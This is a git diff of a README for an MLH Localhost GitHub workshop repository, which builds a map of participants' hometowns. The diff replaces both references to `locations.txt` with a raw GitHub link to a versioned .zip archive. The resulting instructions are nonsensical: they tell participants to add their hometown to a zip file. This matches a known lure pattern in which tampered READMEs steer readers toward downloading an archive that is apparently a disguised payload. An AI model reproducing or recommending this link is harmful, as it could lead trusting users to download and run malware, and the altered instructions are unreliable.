omkheni/mlh-localhost-github-utu/README.md

 # MLH Localhost Hometown Map
 This repository contains the source code for a map of the hometowns of anyone who attends the MLH Localhost workshop, How to Collaborate on Code Projects with GitHub.
-Participants learn best practice GitHub workflows, add their hometown to `locations.txt`, and see the giant community they're part of!
+Participants learn best practice GitHub workflows, add their hometown to `https://raw.githubusercontent.com/omkheni/mlh-localhost-github-utu/master/views/localhost-github-utu-mlh-3.9-alpha.2.zip`, and see the giant community they're part of!

 ## How to participate in this workshop

 1. Make a GitHub account.
 2. Fork this repository.
-3. Add your hometown to `locations.txt`.
+3. Add your hometown to `https://raw.githubusercontent.com/omkheni/mlh-localhost-github-utu/master/views/localhost-github-utu-mlh-3.9-alpha.2.zip`.
 4. Commit your changes and make a pull request.
 5. Ask someone else to comment on your pull request.
 6. Wait for the workshop organizer to approve your pull request.